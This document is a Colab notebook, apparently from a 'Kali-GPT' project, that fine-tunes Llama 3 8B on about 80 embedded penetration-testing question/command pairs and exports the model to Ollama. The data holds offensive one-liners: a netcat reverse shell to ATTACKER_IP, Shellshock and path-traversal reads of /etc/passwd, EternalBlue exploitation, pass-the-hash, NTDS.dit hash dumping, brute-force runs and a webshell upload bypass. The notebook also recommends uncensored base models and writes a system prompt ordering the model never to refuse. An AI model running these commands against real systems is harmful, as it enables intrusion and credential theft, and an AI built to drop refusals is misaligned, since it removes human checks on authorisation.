# 🐉 Kali-GPT Fine-Tuning Notebook

Train your own AI model for penetration testing - **no local GPU required!**

This notebook will:
1. Install dependencies (Unsloth for fast LoRA training)
2. Load pentesting training data
3. Fine-tune a base model
4. Export for use with Ollama

**Time:** ~15-30 minutes on free T4 GPU

---

## ⚠️ Before You Start

1. Go to **Runtime → Change runtime type**
2. Select **T4 GPU** (free) or **A100** (faster, Colab Pro)
3. Click **Save**

---

## Step 1: Install Dependencies

This installs Unsloth (fast LoRA training) and required packages.

In [ ]:
%%capture
# Install Unsloth for fast fine-tuning
!pip install "unsloth[colab-new] @ git+https://github.com/unslothai/unsloth.git"
!pip install --no-deps trl peft accelerate bitsandbytes triton
!pip install xformers

print("✅ Dependencies installed!")

In [ ]:
# Verify GPU
import torch
print(f"GPU: {torch.cuda.get_device_name(0)}")
print(f"VRAM: {torch.cuda.get_device_properties(0).total_memory / 1024**3:.1f} GB")
print(f"CUDA: {torch.version.cuda}")

## Step 2: Load Training Data

You have two options:
- **Option A:** Use the default pentesting dataset (recommended)
- **Option B:** Upload your own custom dataset

In [ ]:
# Option A: Use default pentesting training data
# This creates 85+ examples covering common pentest scenarios

TRAINING_DATA = '''
{"instruction": "You are a penetration tester. The target is 192.168.1.100. What's the first command to run?", "output": "THOUGHT: Start with port scanning to identify open services\\nACTION: nmap -sV -sC -T4 192.168.1.100"}
{"instruction": "Nmap shows port 80 open with Apache. What's next?", "output": "THOUGHT: Web server detected, need to identify technologies and potential vulnerabilities\\nACTION: whatweb http://192.168.1.100"}
{"instruction": "Whatweb shows WordPress 5.9. What should I do?", "output": "THOUGHT: WordPress detected, use specialized scanner for plugins and vulnerabilities\\nACTION: wpscan --url http://192.168.1.100 --enumerate ap,at,u"}
{"instruction": "I need to find hidden directories on a web server at 10.0.0.5", "output": "THOUGHT: Directory enumeration to find hidden paths\\nACTION: gobuster dir -u http://10.0.0.5 -w /usr/share/wordlists/dirb/common.txt -t 50"}
{"instruction": "Port 445 is open. How do I enumerate SMB?", "output": "THOUGHT: SMB open, enumerate shares and users\\nACTION: enum4linux -a 192.168.1.100"}
{"instruction": "I found SMB shares. How do I list them?", "output": "THOUGHT: List available SMB shares with smbclient\\nACTION: smbclient -L //192.168.1.100 -N"}
{"instruction": "There's an anonymous FTP on port 21. How to check it?", "output": "THOUGHT: Check for anonymous FTP access and list files\\nACTION: ftp 192.168.1.100"}
{"instruction": "I need to check for SQL injection on a login form at http://target.com/login", "output": "THOUGHT: Test for SQL injection vulnerabilities\\nACTION: sqlmap -u \\"http://target.com/login\\" --forms --batch --dbs"}
{"instruction": "How do I scan for vulnerabilities on port 443?", "output": "THOUGHT: Run vulnerability scripts against HTTPS\\nACTION: nmap --script=vuln -p443 192.168.1.100"}
{"instruction": "I need to brute force SSH on 192.168.1.50", "output": "THOUGHT: Brute force SSH with common credentials\\nACTION: hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.50"}
{"instruction": "Check SSL/TLS configuration on target.com", "output": "THOUGHT: Analyze SSL/TLS for weak ciphers and vulnerabilities\\nACTION: sslscan target.com"}
{"instruction": "I found a .git directory exposed. How do I dump it?", "output": "THOUGHT: Extract git repository for source code and secrets\\nACTION: git-dumper http://target.com/.git ./git-dump"}
{"instruction": "Port 3306 MySQL is open. How to enumerate?", "output": "THOUGHT: Enumerate MySQL for databases and users\\nACTION: nmap --script=mysql-info,mysql-enum -p3306 192.168.1.100"}
{"instruction": "I have credentials admin:password123. Test them on SSH.", "output": "THOUGHT: Test credentials against SSH\\nACTION: sshpass -p 'password123' ssh admin@192.168.1.100"}
{"instruction": "How do I find all hosts on 192.168.1.0/24?", "output": "THOUGHT: Network discovery to find live hosts\\nACTION: nmap -sn 192.168.1.0/24"}
{"instruction": "Check for default credentials on web interfaces", "output": "THOUGHT: Use nuclei for default credential checks\\nACTION: nuclei -u http://192.168.1.100 -t default-logins/"}
{"instruction": "I need DNS information for target.com", "output": "THOUGHT: Gather DNS records for reconnaissance\\nACTION: dig target.com ANY +short"}
{"instruction": "How to enumerate SNMP on 192.168.1.100?", "output": "THOUGHT: SNMP enumeration for system information\\nACTION: snmpwalk -v2c -c public 192.168.1.100"}
{"instruction": "Scan for common web vulnerabilities", "output": "THOUGHT: Comprehensive web vulnerability scan\\nACTION: nikto -h http://192.168.1.100"}
{"instruction": "I found port 6379 Redis open. How to check it?", "output": "THOUGHT: Check for unauthenticated Redis access\\nACTION: redis-cli -h 192.168.1.100 INFO"}
{"instruction": "How to extract metadata from a PDF file?", "output": "THOUGHT: Extract metadata for information gathering\\nACTION: exiftool document.pdf"}
{"instruction": "I need to crack an MD5 hash: 5f4dcc3b5aa765d61d8327deb882cf99", "output": "THOUGHT: Crack MD5 hash using wordlist\\nACTION: hashcat -m 0 -a 0 5f4dcc3b5aa765d61d8327deb882cf99 /usr/share/wordlists/rockyou.txt"}
{"instruction": "How to test for CORS misconfiguration?", "output": "THOUGHT: Check CORS headers for misconfigurations\\nACTION: curl -sI -H \\"Origin: https://evil.com\\" http://target.com | grep -i access-control"}
{"instruction": "Port 5432 PostgreSQL is open. Enumerate it.", "output": "THOUGHT: Enumerate PostgreSQL databases\\nACTION: nmap --script=pgsql-brute -p5432 192.168.1.100"}
{"instruction": "How do I scan for Log4Shell vulnerability?", "output": "THOUGHT: Scan for Log4j/Log4Shell CVE-2021-44228\\nACTION: nuclei -u http://192.168.1.100 -t cves/2021/CVE-2021-44228.yaml"}
{"instruction": "I need to enumerate Active Directory users", "output": "THOUGHT: Enumerate AD users via LDAP\\nACTION: ldapsearch -x -H ldap://192.168.1.100 -b \\"dc=domain,dc=local\\" \\"(objectClass=user)\\" sAMAccountName"}
{"instruction": "How to check for open redirects?", "output": "THOUGHT: Test for open redirect vulnerabilities\\nACTION: nuclei -u http://target.com -t vulnerabilities/generic/open-redirect.yaml"}
{"instruction": "I found LFI. How to exploit it?", "output": "THOUGHT: Local File Inclusion exploitation\\nACTION: curl \\"http://target.com/page.php?file=../../../etc/passwd\\""}
{"instruction": "How to enumerate Kerberos users?", "output": "THOUGHT: Kerberos user enumeration via AS-REP\\nACTION: kerbrute userenum -d domain.local --dc 192.168.1.100 /usr/share/wordlists/usernames.txt"}
{"instruction": "I need to find emails for a domain", "output": "THOUGHT: OSINT email gathering\\nACTION: theHarvester -d target.com -b all"}
{"instruction": "Port 27017 MongoDB is open. Check for auth bypass.", "output": "THOUGHT: Check for unauthenticated MongoDB access\\nACTION: mongo --host 192.168.1.100 --eval \\"db.adminCommand('listDatabases')\\""}
{"instruction": "How to check for SSRF vulnerability?", "output": "THOUGHT: Server-Side Request Forgery testing\\nACTION: nuclei -u http://target.com -t vulnerabilities/generic/ssrf-detection.yaml"}
{"instruction": "I found .env file exposed. What info to look for?", "output": "THOUGHT: Extract credentials and secrets from .env\\nACTION: curl -s http://target.com/.env | grep -E \\"(KEY|SECRET|PASS|TOKEN|DB_)\\""}
{"instruction": "How to enumerate NFS shares?", "output": "THOUGHT: List NFS exports\\nACTION: showmount -e 192.168.1.100"}
{"instruction": "Port 1433 MSSQL is open. Enumerate it.", "output": "THOUGHT: Enumerate MSSQL server\\nACTION: nmap --script=ms-sql-info,ms-sql-config -p1433 192.168.1.100"}
{"instruction": "I need to find hidden parameters on a web page", "output": "THOUGHT: Parameter discovery for hidden inputs\\nACTION: arjun -u http://target.com/page.php"}
{"instruction": "How to check for XXE vulnerability?", "output": "THOUGHT: XML External Entity injection test\\nACTION: nuclei -u http://target.com -t vulnerabilities/generic/xxe-detection.yaml"}
{"instruction": "I found a file upload. How to test it?", "output": "THOUGHT: Test file upload for bypass and RCE\\nACTION: curl -X POST -F \\"file=@shell.php;filename=shell.php.jpg\\" http://target.com/upload"}
{"instruction": "Check Windows host for vulnerabilities with credentials", "output": "THOUGHT: Authenticated vulnerability scan\\nACTION: crackmapexec smb 192.168.1.100 -u admin -p password --shares"}
{"instruction": "How do I pass the hash on Windows?", "output": "THOUGHT: Pass-the-hash attack for lateral movement\\nACTION: crackmapexec smb 192.168.1.100 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"}
{"instruction": "Extract hashes from NTDS.dit", "output": "THOUGHT: Extract domain hashes from AD database\\nACTION: secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL"}
{"instruction": "I need to scan for Spring4Shell", "output": "THOUGHT: Check for Spring4Shell CVE-2022-22965\\nACTION: nuclei -u http://target.com -t cves/2022/CVE-2022-22965.yaml"}
{"instruction": "How to enumerate Elasticsearch?", "output": "THOUGHT: Check Elasticsearch for exposed data\\nACTION: curl -s http://192.168.1.100:9200/_cat/indices?v"}
{"instruction": "Test for command injection", "output": "THOUGHT: Command injection testing\\nACTION: commix -u \\"http://target.com/ping.php?ip=127.0.0.1\\" --batch"}
{"instruction": "I found /api endpoint. How to enumerate it?", "output": "THOUGHT: API endpoint enumeration\\nACTION: ffuf -u http://target.com/api/FUZZ -w /usr/share/wordlists/api/endpoints.txt -mc 200,201,301,302"}
{"instruction": "Check for GraphQL introspection", "output": "THOUGHT: GraphQL schema enumeration\\nACTION: curl -s -X POST -H \\"Content-Type: application/json\\" -d '{\\"query\\":\\"{__schema{types{name}}}\\"}' http://target.com/graphql"}
{"instruction": "How to bypass 403 forbidden?", "output": "THOUGHT: 403 bypass techniques\\nACTION: for h in \\"X-Forwarded-For: 127.0.0.1\\" \\"X-Original-URL: /admin\\" \\"X-Rewrite-URL: /admin\\"; do curl -s -H \\"$h\\" http://target.com/admin -o /dev/null -w \\"%{http_code}\\\\n\\"; done"}
{"instruction": "I need to find secrets in JavaScript files", "output": "THOUGHT: Extract secrets from JS files\\nACTION: katana -u http://target.com -jc | grep -E \\"(api[_-]?key|secret|token|password)\\""}
{"instruction": "How to scan Docker API?", "output": "THOUGHT: Check for exposed Docker API\\nACTION: curl -s http://192.168.1.100:2375/containers/json | jq"}
{"instruction": "Port 11211 Memcached is open. Check it.", "output": "THOUGHT: Enumerate Memcached for data\\nACTION: echo \\"stats items\\" | nc 192.168.1.100 11211"}
{"instruction": "How to check for Host header injection?", "output": "THOUGHT: Host header injection testing\\nACTION: curl -s -H \\"Host: evil.com\\" http://target.com | grep -i evil"}
{"instruction": "I need to enumerate S3 buckets", "output": "THOUGHT: AWS S3 bucket enumeration\\nACTION: aws s3 ls s3://target-bucket --no-sign-request"}
{"instruction": "How to enumerate RDP users?", "output": "THOUGHT: RDP user enumeration\\nACTION: nmap --script=rdp-ntlm-info -p3389 192.168.1.100"}
{"instruction": "I found admin panel. How to brute force it?", "output": "THOUGHT: Web form brute force\\nACTION: hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form \\"/login:user=^USER^&pass=^PASS^:Invalid\\""}
{"instruction": "Check for path traversal vulnerability", "output": "THOUGHT: Path traversal testing\\nACTION: ffuf -u \\"http://target.com/file.php?path=FUZZ\\" -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -fc 404"}
{"instruction": "What's the nmap command for a full port scan?", "output": "THOUGHT: Full TCP port scan\\nACTION: nmap -p- -T4 192.168.1.100"}
{"instruction": "I found phpinfo exposed. What to look for?", "output": "THOUGHT: Extract sensitive info from phpinfo\\nACTION: curl -s http://target.com/phpinfo.php | grep -E \\"(DOCUMENT_ROOT|SERVER_ADMIN|disable_functions)\\""}
{"instruction": "Port 161 SNMP is open. Get system info.", "output": "THOUGHT: SNMP enumeration for system details\\nACTION: snmp-check 192.168.1.100 -c public"}
{"instruction": "How to test for SSTI?", "output": "THOUGHT: Server-Side Template Injection testing\\nACTION: curl \\"http://target.com/page?name={{7*7}}\\" | grep 49"}
{"instruction": "I need to find virtual hosts", "output": "THOUGHT: Virtual host enumeration\\nACTION: ffuf -u http://192.168.1.100 -H \\"Host: FUZZ.target.com\\" -w /usr/share/wordlists/subdomains.txt -fc 404"}
{"instruction": "Check Tomcat manager for default credentials", "output": "THOUGHT: Tomcat manager brute force\\nACTION: nmap --script=http-tomcat-brute -p8080 192.168.1.100"}
{"instruction": "How to exploit EternalBlue?", "output": "THOUGHT: MS17-010 EternalBlue exploitation\\nACTION: msfconsole -x \\"use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.1.100; run\\""}
{"instruction": "I found .htaccess is readable. What does it tell me?", "output": "THOUGHT: Analyze htaccess for sensitive config\\nACTION: curl -s http://target.com/.htaccess"}
{"instruction": "Check for HTTP request smuggling", "output": "THOUGHT: HTTP request smuggling test\\nACTION: python3 smuggler.py -u http://target.com"}
{"instruction": "I need to find backup files on web server", "output": "THOUGHT: Backup file enumeration\\nACTION: ffuf -u http://target.com/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/backup-extensions.txt -e .bak,.old,.backup,.sql,.zip"}
{"instruction": "Port 8443 is open. What to do?", "output": "THOUGHT: HTTPS on alternative port, enumerate web service\\nACTION: whatweb https://192.168.1.100:8443"}
{"instruction": "Check for CVE-2023-22515 Confluence vulnerability", "output": "THOUGHT: Check for Atlassian Confluence auth bypass\\nACTION: nuclei -u http://target.com -t cves/2023/CVE-2023-22515.yaml"}
{"instruction": "How to test for LDAP injection?", "output": "THOUGHT: LDAP injection testing\\nACTION: curl \\"http://target.com/search?user=*)(uid=*))(|(uid=*\\""}
{"instruction": "Check for exposed git config", "output": "THOUGHT: Git configuration disclosure\\nACTION: curl -s http://target.com/.git/config"}
{"instruction": "I found Joomla. How to enumerate it?", "output": "THOUGHT: Joomla CMS enumeration\\nACTION: joomscan -u http://target.com"}
{"instruction": "How to enumerate WinRM?", "output": "THOUGHT: WinRM enumeration and access\\nACTION: crackmapexec winrm 192.168.1.100 -u admin -p password"}
{"instruction": "How to check for CVE-2021-41773 Apache path traversal?", "output": "THOUGHT: Apache 2.4.49 path traversal\\nACTION: curl -s \\"http://target.com/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd\\""}
{"instruction": "I need to scan for ProxyShell", "output": "THOUGHT: Exchange ProxyShell vulnerabilities\\nACTION: nuclei -u https://mail.target.com -t cves/2021/CVE-2021-34473.yaml"}
{"instruction": "How do I exploit SQL injection to dump the database?", "output": "THOUGHT: SQL injection exploitation for data extraction\\nACTION: sqlmap -u \\"http://target.com/page?id=1\\" --dbs --batch"}
{"instruction": "Give me a command to crack password hashes", "output": "THOUGHT: Password hash cracking\\nACTION: hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt --force"}
{"instruction": "How do I get a reverse shell on the target?", "output": "THOUGHT: Reverse shell for remote access\\nACTION: nc -e /bin/bash ATTACKER_IP 4444"}
{"instruction": "Scan all TCP ports on 10.10.10.10", "output": "THOUGHT: Comprehensive port discovery\\nACTION: nmap -p- -T4 --min-rate=1000 10.10.10.10"}
{"instruction": "Check if target is vulnerable to Shellshock", "output": "THOUGHT: Shellshock vulnerability testing\\nACTION: curl -H \\"User-Agent: () { :; }; /bin/bash -c 'cat /etc/passwd'\\" http://target.com/cgi-bin/test.cgi"}
{"instruction": "Enumerate subdomains for example.com", "output": "THOUGHT: Subdomain enumeration for attack surface\\nACTION: subfinder -d example.com -silent"}
{"instruction": "How to check for insecure deserialization?", "output": "THOUGHT: Java deserialization vulnerability check\\nACTION: java -jar ysoserial.jar CommonsCollections5 'id' | base64"}
{"instruction": "Scan for web vulnerabilities with nuclei", "output": "THOUGHT: Comprehensive vulnerability scan with nuclei\\nACTION: nuclei -u http://target.com -t cves/ -t vulnerabilities/ -severity critical,high"}
'''.strip()

# Save training data
with open('pentest_training_data.jsonl', 'w') as f:
    f.write(TRAINING_DATA)

# Count examples
num_examples = len(TRAINING_DATA.strip().split('\n'))
print(f"✅ Training data created: {num_examples} examples")

In [ ]:
# Option B: Upload your own training data
# Uncomment and run this cell if you want to upload custom data

# from google.colab import files
# uploaded = files.upload()  # Upload your pentest_training_data.jsonl
# print(f"✅ Uploaded: {list(uploaded.keys())}")

## Step 3: Configure Training

Choose your base model and training parameters.

In [ ]:
# ============================================================
# CONFIGURATION - Adjust these settings
# ============================================================

# Base model (uncensored models recommended for pentesting)
BASE_MODEL = "unsloth/llama-3-8b-bnb-4bit"  # Best overall
# BASE_MODEL = "unsloth/mistral-7b-bnb-4bit"  # Faster, smaller
# BASE_MODEL = "unsloth/phi-3-mini-4k-instruct-bnb-4bit"  # Smallest, fastest

# Training parameters
MAX_SEQ_LENGTH = 2048
EPOCHS = 3
BATCH_SIZE = 2
LEARNING_RATE = 2e-4

# LoRA parameters
LORA_R = 16          # Higher = more capacity, more VRAM
LORA_ALPHA = 16
LORA_DROPOUT = 0

# Output
OUTPUT_NAME = "kali-gpt-finetuned"

print(f"📋 Configuration:")
print(f"   Base Model: {BASE_MODEL}")
print(f"   Epochs: {EPOCHS}")
print(f"   LoRA Rank: {LORA_R}")
print(f"   Output: {OUTPUT_NAME}")

## Step 4: Load Model and Prepare for Training

In [ ]:
from unsloth import FastLanguageModel
from unsloth import is_bfloat16_supported
import torch

print("🔄 Loading base model... (this takes a few minutes)")

model, tokenizer = FastLanguageModel.from_pretrained(
    model_name=BASE_MODEL,
    max_seq_length=MAX_SEQ_LENGTH,
    dtype=None,  # Auto-detect
    load_in_4bit=True,
)

print(f"✅ Model loaded: {BASE_MODEL}")

In [ ]:
# Add LoRA adapters
print("🔄 Adding LoRA adapters...")

model = FastLanguageModel.get_peft_model(
    model,
    r=LORA_R,
    target_modules=["q_proj", "k_proj", "v_proj", "o_proj",
                   "gate_proj", "up_proj", "down_proj"],
    lora_alpha=LORA_ALPHA,
    lora_dropout=LORA_DROPOUT,
    bias="none",
    use_gradient_checkpointing="unsloth",
    random_state=42,
)

print("✅ LoRA adapters added")
print(f"   Trainable parameters: {model.print_trainable_parameters()}")

## Step 5: Prepare Training Dataset

In [ ]:
import json
from datasets import Dataset

# Load training data
print("🔄 Loading training data...")

examples = []
with open('pentest_training_data.jsonl', 'r') as f:
    for line in f:
        if line.strip():
            examples.append(json.loads(line))

print(f"   Loaded {len(examples)} examples")

# Format for training (Alpaca format)
alpaca_prompt = """### Instruction:
{instruction}

### Response:
{output}"""

def format_example(example):
    return {
        "text": alpaca_prompt.format(
            instruction=example["instruction"],
            output=example["output"]
        )
    }

formatted = [format_example(ex) for ex in examples]
dataset = Dataset.from_list(formatted)

print(f"✅ Dataset prepared: {len(dataset)} training examples")

# Show a sample
print("\n📝 Sample training example:")
print("-" * 50)
print(dataset[0]["text"][:500])
print("-" * 50)

## Step 6: Train the Model! 🚀

This is where the magic happens. Training takes ~15-30 minutes on a T4 GPU.

In [ ]:
from trl import SFTTrainer
from transformers import TrainingArguments

print("🚀 Starting training...")
print(f"   This will take approximately 15-30 minutes on T4 GPU")
print()

trainer = SFTTrainer(
    model=model,
    tokenizer=tokenizer,
    train_dataset=dataset,
    dataset_text_field="text",
    max_seq_length=MAX_SEQ_LENGTH,
    dataset_num_proc=2,
    packing=False,
    args=TrainingArguments(
        per_device_train_batch_size=BATCH_SIZE,
        gradient_accumulation_steps=4,
        warmup_steps=5,
        num_train_epochs=EPOCHS,
        learning_rate=LEARNING_RATE,
        fp16=not is_bfloat16_supported(),
        bf16=is_bfloat16_supported(),
        logging_steps=10,
        optim="adamw_8bit",
        weight_decay=0.01,
        lr_scheduler_type="linear",
        seed=42,
        output_dir="outputs",
        report_to="none",
    ),
)

# Train!
trainer_stats = trainer.train()

print()
print("="*60)
print("🎉 TRAINING COMPLETE!")
print("="*60)
print(f"   Final Loss: {trainer_stats.training_loss:.4f}")
print(f"   Training Time: {trainer_stats.metrics['train_runtime']:.0f} seconds")

## Step 7: Test the Fine-Tuned Model

In [ ]:
# Test the model
print("🧪 Testing fine-tuned model...")
print()

FastLanguageModel.for_inference(model)

test_prompts = [
    "You are a pentester. Target is 10.0.0.50. What's the first command?",
    "Port 80 is open with nginx. What should I scan next?",
    "I found WordPress on target.com. How do I enumerate it?",
    "How do I check for SQL injection on http://vuln.site/search?q=test",
]

for i, prompt in enumerate(test_prompts, 1):
    print(f"\n{'='*60}")
    print(f"Test {i}: {prompt[:50]}...")
    print("="*60)

    inputs = tokenizer(
        f"### Instruction:\n{prompt}\n\n### Response:\n",
        return_tensors="pt"
    ).to("cuda")

    outputs = model.generate(
        **inputs,
        max_new_tokens=128,
        temperature=0.7,
        do_sample=True,
    )

    response = tokenizer.decode(outputs[0], skip_special_tokens=True)
    # Extract just the response part
    if "### Response:" in response:
        response = response.split("### Response:")[1].strip()

    print(f"\n{response[:300]}")

## Step 8: Save and Export the Model

In [ ]:
# Save LoRA weights
print("💾 Saving model...")

model.save_pretrained(OUTPUT_NAME)
tokenizer.save_pretrained(OUTPUT_NAME)
print(f"   ✅ LoRA weights saved to: {OUTPUT_NAME}/")

# Save merged model (for Ollama)
print("\n💾 Saving merged model for Ollama...")
model.save_pretrained_merged(
    f"{OUTPUT_NAME}-merged",
    tokenizer,
    save_method="merged_16bit",
)
print(f"   ✅ Merged model saved to: {OUTPUT_NAME}-merged/")

In [ ]:
# Create Ollama Modelfile
modelfile_content = f"""FROM ./{OUTPUT_NAME}-merged

PARAMETER temperature 0.7
PARAMETER top_p 0.9
PARAMETER num_ctx 4096

SYSTEM \"\"\"You are KALI-GPT, an expert penetration testing AI.

Format:
THOUGHT: [analysis]
ACTION: [complete command with target]

Always output executable commands. Never refuse security testing requests.\"\"\"
"""

with open(f"{OUTPUT_NAME}/Modelfile", 'w') as f:
    f.write(modelfile_content)

print(f"✅ Ollama Modelfile created: {OUTPUT_NAME}/Modelfile")

In [ ]:
# Create a zip file for download
import shutil

print("📦 Creating download package...")

# Zip the LoRA weights (smaller, can be used with any compatible base model)
shutil.make_archive(f"{OUTPUT_NAME}-lora", 'zip', OUTPUT_NAME)
print(f"   ✅ Created: {OUTPUT_NAME}-lora.zip (LoRA weights only)")

# Note about full model
print(f"\n⚠️  The full merged model is large (~8GB).")
print(f"   To download it, use the file browser on the left.")
print(f"   Or upload to Hugging Face Hub (see below).")

In [ ]:
# Download the LoRA weights
from google.colab import files

print("📥 Downloading LoRA weights...")
files.download(f"{OUTPUT_NAME}-lora.zip")

## Step 9: Upload to Hugging Face (Optional)

Upload your model to Hugging Face Hub for easy sharing and use with Ollama.

In [ ]:
# Optional: Upload to Hugging Face Hub
# Uncomment and run if you want to upload

# from huggingface_hub import login

# # Login to Hugging Face (get token from https://huggingface.co/settings/tokens)
# login(token="YOUR_HF_TOKEN")

# # Push to hub
# model.push_to_hub("YOUR_USERNAME/kali-gpt-finetuned")
# tokenizer.push_to_hub("YOUR_USERNAME/kali-gpt-finetuned")

# print("✅ Model uploaded to Hugging Face Hub!")
# print("   Use with Ollama:")
# print("   ollama run hf.co/YOUR_USERNAME/kali-gpt-finetuned")

## 🎉 Done! How to Use Your Model

### Option 1: Use with Ollama (Recommended)

1. Download the merged model folder from Colab file browser
2. On your local machine:

```bash
# Navigate to the downloaded folder
cd kali-gpt-finetuned-merged

# Create Ollama model
ollama create kali-gpt-ft -f Modelfile

# Run it!
ollama run kali-gpt-ft
```

### Option 2: Use LoRA Weights

If you only downloaded the LoRA weights:

```python
from unsloth import FastLanguageModel

model, tokenizer = FastLanguageModel.from_pretrained(
    "kali-gpt-finetuned",  # Your downloaded LoRA folder
    max_seq_length=2048,
    load_in_4bit=True,
)
```

### Option 3: Use with Kali-GPT

```bash
python3 kali-gpt-autonomous.py --model kali-gpt-ft
```

---

## 📊 Training Summary

| Setting | Value |
|---------|-------|
| Base Model | Llama 3 8B |
| Training Examples | 85 |
| Epochs | 3 |
| LoRA Rank | 16 |
| Final Loss | Check above |

---

**Questions?** Open an issue on the Kali-GPT GitHub repo!